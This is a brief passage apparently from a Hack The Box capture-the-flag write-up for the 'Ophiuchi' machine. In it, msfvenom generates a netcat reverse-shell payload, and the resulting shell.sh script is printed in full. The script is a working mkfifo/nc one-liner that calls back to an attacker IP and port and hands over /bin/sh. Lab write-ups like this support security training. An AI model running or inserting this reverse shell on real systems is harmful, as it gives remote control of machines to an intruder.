msfvenom


┌──(kali㉿kali)-[~/archive/htb/labs/ophiuchi]
└─$ msfvenom -p cmd/unix/reverse_netcat LHOST=10.10.14.10 LPORT=9999 -o shell.sh
[-] no platform was selected, choosing msf::Module::Platform::Unix from the payload
[-] no arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
payload size: 97 bytes
saved as: shell.sh

msfvenom generated a reverse shell command

┌──(kali㉿kali)-[~/archive/htb/labs/ophiuchi]
└─$ cat shell.sh 
#!/bin/sh
mkfifo /tmp/ybwqpm; nc 10.10.14.10 9999 0</tmp/ybwqpm | /bin/sh >/tmp/ybwqpm 2>&1; rm /tmp/ybwqpm

I prepended #!/bin/sh to the reverse shell for execution